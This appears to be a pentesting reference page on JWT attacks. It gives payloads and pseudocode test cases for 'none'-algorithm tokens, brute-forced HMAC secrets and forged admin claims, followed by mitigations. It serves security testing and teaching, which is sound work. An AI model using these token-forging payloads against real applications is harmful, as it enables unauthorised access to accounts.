JWT
JWT Attacks
Description
JWT (JSON Web Token) attacks exploit vulnerabilities in the implementation or usage of JWTs, allowing attackers to forge tokens, manipulate claims, or perform other malicious actions.
Example with Scenario
Scenario: A web application uses JWTs for user authentication. An attacker can exploit weak signing algorithms or insecure storage to forge tokens and gain unauthorized access.
Payloads and Test Cases
Payloads
None Algorithm Attack:
{ "alg": "none" }
Brute Force HMAC Secret:
{ "header": { "alg": "HS256", "typ": "JWT" }, "payload": { "user": "admin" }, "signature": "generated_signature" }
Claim Manipulation:
{ "header": { "alg": "HS256", "typ": "JWT" }, "payload": { "user": "attacker", "admin": true }, "signature": "generated_signature" }
Test Cases
None Algorithm Attack:
Payload:
{ "alg": "none" }
Test Case:
# Create a JWT with the 'none' algorithm jwtToken = createJWT({"alg": "none"}, {"user": "admin"}, "") # Send the token to the server sendJWTToServer(jwtToken) # Verify if the server accepts the token without validation checkAdminAccessGranted()
Brute Force HMAC Secret:
Payload:
{ "header": { "alg": "HS256", "typ": "JWT" }, "payload": { "user": "admin" }, "signature": "generated_signature" }
Test Case:
# Generate a JWT with a known weak secret jwtToken = createJWT({"alg": "HS256"}, {"user": "admin"}, "weak_secret") # Send the token to the server sendJWTToServer(jwtToken) # Verify if the server accepts the token checkAdminAccessGranted()
Claim Manipulation:
Payload:
{ "header": { "alg": "HS256", "typ": "JWT" }, "payload": { "user": "attacker", "admin": true }, "signature": "generated_signature" }
Test Case:
# Create a JWT with manipulated claims jwtToken = createJWT({"alg": "HS256"}, {"user": "attacker", "admin": True}, "valid_secret") # Send the token to the server sendJWTToServer(jwtToken) # Verify if the server grants admin access checkAdminAccessGranted()
Mitigation
Use Strong Secrets:
Use strong, random secrets for signing JWTs.
Avoid using weak or easily guessable secrets.
Validate Tokens Properly:
Always validate the token signature and claims.
Reject tokens with invalid or missing signatures.
Enforce Algorithm Constraints:
Enforce the use of secure algorithms (e.g., HS256, RS256).
Reject tokens with the 'none' algorithm or other weak algorithms.
Secure Token Storage:
Store JWTs securely on the client side (e.g., HTTP-only cookies).
Avoid storing tokens in local storage or other insecure places.
Implement Expiry and Revocation:
Implement token expiry and refresh mechanisms.
Provide a way to revoke tokens when necessary.
Last updated